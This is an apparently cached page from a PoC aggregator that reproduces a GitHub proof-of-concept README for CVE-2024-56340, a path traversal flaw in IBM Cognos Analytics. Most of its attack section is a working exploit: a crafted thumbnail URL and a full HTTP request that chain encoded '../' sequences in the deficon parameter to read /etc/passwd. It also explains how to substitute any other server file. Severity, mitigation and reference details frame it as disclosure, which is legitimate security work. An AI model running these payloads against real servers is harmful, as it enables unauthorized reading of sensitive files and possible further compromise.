Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-56340 PoC — IBM Cognos Analytics 安全漏洞

Source
https://github.com/MarioTesoro/CVE-2024-56340
Associated Vulnerability
Title:IBM Cognos Analytics 安全漏洞 (CVE-2024-56340)
Description:IBM Cognos Analytics是美国国际商业机器(IBM)公司的一套商业智能软件。该软件包括报表、仪表板和记分卡等,并可通过分析关键因素与关键人等内容,协助企业调整决策。 IBM Cognos Analytics 11.2.0至11.2.4 FP5版本存在安全漏洞,该漏洞源于deficon参数路径遍历,可能导致敏感文件访问。
Description
IBM Cognos Analytics Path Traversal,  Poc of CVE-2024-56340
Readme
# CVE-2024-56340

**Severity :** **Medium** (**6.5**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` 

## Summary :
**IBM Cognos Analytics 11.2.0** through **11.2.4 FP5** could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
## Poc
Afer logging into IBM Cognos Analytics, if the user has such grants to reach the following url, it is possible tor read files stored serverside using path traversal payloads, in this case unix payloads have been used to read /etc/passwd.
### Steps to Reproduce :
1. Login into the app.
2. Embed this url customizing it with the vulnerable **domain** to read /etc/passwd or replace the %fetc%2fpasswd with the file to read with / url-encoded:
```
https://<domain>/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3
```
Full request:
```
GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1
Host: <host>
Cookie: <cookie> 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
NOTE: Other files can be read traversing the files, appending the files to search with path url-encoded in place of %2fetc%2fpasswd ``

## Affected Version Details :

 - $\le$ 11.2.4 $\geq$ 11.2.0

## Impact :

The attacker can read files stored serverside, where the tool have been installed. This can be a vector to perform RCE if some conditions are verified on the victim machine.
## Mitigation :

-  Update to version > 11.2.4
  
## References :
- https://nvd.nist.gov/vuln/detail/CVE-2024-56340
File Snapshot

 [4.0K]  /data/pocs/54eef242e97271e7fb8924654a393542758511d3
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.